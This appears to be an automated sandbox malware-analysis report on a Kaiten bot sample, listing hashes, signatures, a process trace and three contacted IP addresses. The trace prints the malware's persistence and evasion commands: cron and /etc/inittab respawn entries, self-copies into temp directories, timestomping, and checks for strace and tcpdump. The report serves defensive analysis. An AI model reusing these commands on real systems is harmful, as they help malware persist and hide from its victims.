Malware Analysis Report

2024-11-13 17:34

Sample ID 220314-c21yescbd5
Target 582a434ba0f2e04bd8b5495c50320068
SHA256 7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3
Tags
kaiten persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7d3855bb09f2f6111d6c71e06e1e6b06dd47b1dade49af0235b220966c2f5be3

Threat Level: Known bad

The file 582a434ba0f2e04bd8b5495c50320068 was found to be: Known bad.

Malicious Activity Summary

kaiten persistence

Identified Kaiten Bot

Kaiten family

Writes file to system bin folder

Modifies rc script

Write file to user bin folder

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-14 02:35

Signatures

Identified Kaiten Bot

Description Indicator Process Target
N/A N/A N/A N/A

Kaiten family

kaiten

Analysis: behavioral1

Detonation Overview

Submitted

2022-03-14 02:35

Reported

2022-03-14 02:37

Platform

ubuntu1804-amd64-en-20211208

Max time kernel

0s

Max time network

102s

Command Line

[./582a434ba0f2e04bd8b5495c50320068]

Signatures

Writes file to system bin folder

Description Indicator Process Target
/bin/crontab /bin/crontab N/A N/A
/bin/nvram /bin/nvram N/A N/A
/bin/uname /bin/uname N/A N/A

Modifies rc script

persistence
Description Indicator Process Target
/etc/rc.local /etc/rc.local ./582a434ba0f2e04bd8b5495c50320068 N/A

Write file to user bin folder

Description Indicator Process Target
/usr/bin/crontab /usr/bin/crontab N/A N/A
/usr/sbin/nvram /usr/sbin/nvram N/A N/A

Reads runtime system information

Description Indicator Process Target
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A
/proc/filesystems /proc/filesystems /bin/cp N/A

Writes file to tmp directory

Description Indicator Process Target
/tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 /bin/cp N/A
/tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 /bin/cp N/A
/tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 /bin/cp N/A
/tmp/582a434ba0f2e04bd8b5495c50320068 /tmp/582a434ba0f2e04bd8b5495c50320068 /bin/cp N/A
/tmp/.bawtz /tmp/.bawtz ./582a434ba0f2e04bd8b5495c50320068 N/A

Processes

./582a434ba0f2e04bd8b5495c50320068

[./582a434ba0f2e04bd8b5495c50320068]

/bin/sh

[sh -c pidof -x strace > /dev/null]

/bin/pidof

[pidof -x strace]

/bin/sh

[sh -c pidof -x tcpdump > /dev/null]

/bin/pidof

[pidof -x tcpdump]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]

/bin/sh

[sh -c crontab -r]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /tmp/582a434ba0f2e04bd8b5495c50320068]

/usr/bin/crontab

[crontab -r]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /tmp/582a434ba0f2e04bd8b5495c50320068]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/bin/cat

[cat /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c /bin/uname -n]

/bin/sh

[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]

/bin/cp

[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /dev/shm/582a434ba0f2e04bd8b5495c50320068]

/bin/uname

[/bin/uname -n]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/dev/shm/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /dev/shm/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /dev/shm/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep /dev/shm/582a434ba0f2e04bd8b5495c50320068]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep -v /dev/shm/582a434ba0f2e04bd8b5495c50320068]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/dev/shm/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/bin/cat

[cat /etc/inittab2]

/usr/bin/crontab

[crontab -l]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]

/bin/cp

[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/tmp/582a434ba0f2e04bd8b5495c50320068]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/tmp/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/tmp/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/tmp/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/tmp/582a434ba0f2e04bd8b5495c50320068]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /var/tmp/582a434ba0f2e04bd8b5495c50320068]

/bin/sh

[sh -c echo "0:2345:respawn:/var/tmp/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]

/bin/cp

[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/lock/582a434ba0f2e04bd8b5495c50320068]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/lock/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/lock/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/lock/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/lock/582a434ba0f2e04bd8b5495c50320068]

/usr/bin/crontab

[crontab -l]

/bin/grep

[grep /var/lock/582a434ba0f2e04bd8b5495c50320068]

/bin/sh

[sh -c echo "0:2345:respawn:/var/lock/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

/bin/sh

[sh -c cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]

/bin/cp

[cp -f /tmp/582a434ba0f2e04bd8b5495c50320068 /var/run/582a434ba0f2e04bd8b5495c50320068]

/bin/sh

[sh -c cat /etc/inittab | grep -v "/var/run/582a434ba0f2e04bd8b5495c50320068" > /etc/inittab2]

/bin/sh

[sh -c crontab -l | grep /var/run/582a434ba0f2e04bd8b5495c50320068 | grep -v "no cron" || (crontab -l ; echo "* * * * * /var/run/582a434ba0f2e04bd8b5495c50320068 > /dev/null 2>&1 &") | crontab -]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab]

/bin/grep

[grep -v /var/run/582a434ba0f2e04bd8b5495c50320068]

/bin/grep

[grep /var/run/582a434ba0f2e04bd8b5495c50320068]

/bin/grep

[grep -v no cron]

/bin/sh

[sh -c echo "0:2345:respawn:/var/run/582a434ba0f2e04bd8b5495c50320068" >> /etc/inittab2]

/usr/bin/crontab

[crontab -]

/bin/sh

[sh -c cat /etc/inittab2 > /etc/inittab]

/usr/bin/crontab

[crontab -l]

/bin/cat

[cat /etc/inittab2]

/bin/sh

[sh -c rm -rf /etc/inittab2]

/bin/rm

[rm -rf /etc/inittab2]

/bin/sh

[sh -c touch -acmr /bin/ls /etc/inittab]

/usr/bin/touch

[touch -acmr /bin/ls /etc/inittab]

Network

Country Destination Domain Proto
NL 67.209.115.148:8080 tcp
SG 194.59.165.52:8080 tcp
SG 37.44.244.106:8080 tcp

Files

N/A